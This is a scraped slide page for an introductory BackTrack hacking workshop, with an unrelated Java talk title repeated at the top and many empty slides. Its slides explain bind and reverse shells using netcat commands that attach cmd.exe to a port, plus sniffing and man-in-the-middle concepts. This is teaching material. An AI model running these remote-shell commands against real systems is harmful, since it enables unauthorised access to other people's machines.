Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 

Workshop on BackTrack live CD

  • 1. Introduction to BackTrack Local boot to remote root in just one CD Thought for the day, “Don’t learn to hack, hack to learn”..!!! - darknet.org.uk Kunal Sehgal [email_address]
  • 2.
  • 3.
  • 4.
  • 5. Attacker (Private IP) Victim (Public IP) NAT Internet Bind Shell: nc -lvp 4444 -e cmd.exe nc -v <IP> 4444 Internet Attacker Connects to Victim (Incoming Traffic)
  • 6. Attacker (Public IP) Victim (Private IP) Internet Reverse Shell: nc -v <IP> 4444 -e cmd.exe nc -lvp 4444 Internet NAT Victim sends the shell (Outgoing Traffic)
  • 7.
  • 8.
  • 9.
  • 10. Attacker Sender Receiver Network Using A Hub Can easily sniff data
  • 11. Attacker Sender Receiver Network Using A Switch Cannot sniff any data :(
  • 12. Attacker Sender Receiver Man In The Middle Attack Hi everyone, I’m the switch
  • 13.
  • 14.
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25.